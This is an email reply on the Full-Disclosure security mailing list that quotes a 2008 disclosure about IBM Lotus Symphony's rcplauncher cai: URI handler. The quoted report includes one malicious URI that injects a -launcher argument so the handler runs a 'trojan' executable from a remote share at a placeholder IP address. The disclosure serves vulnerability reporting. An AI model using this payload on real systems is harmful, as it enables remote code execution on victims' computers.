<div>Very nice, looks a lot like some of my work in URI handler abuse.</div>
<div> </div>
<div>-Nate<br><br> </div>
<div><span class="gmail_quote">On 4/24/08, <b class="gmail_sendername">Thomas Pollet</b> <<a href="mailto:thomas.pollet@gmail.com">thomas.pollet@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I have found that the lotus expeditor rcplauncher as installed by lotus symphony and possibly other products, registers a cai: uri handler.<br>
This handler executes<br>"D:\Program Files\IBM\Lotus\Symphony
<div>\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"<br>the rcplauncher process accepts various arguments which can be abused to execute arbitrary code.<br>The argument to the -launcher option for example is an executable that will be executed.<br>
<br>malicious uri example:<br>cai:"%20-launcher%20\\<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://6.6.6.6/" target="_blank">6.6.6.6</a>\d$\trojan<br><br>Regards,<br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://thomas.pollet.googlepages.com/" target="_blank">Thomas Pollet</a><br>
<br> </div><br><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>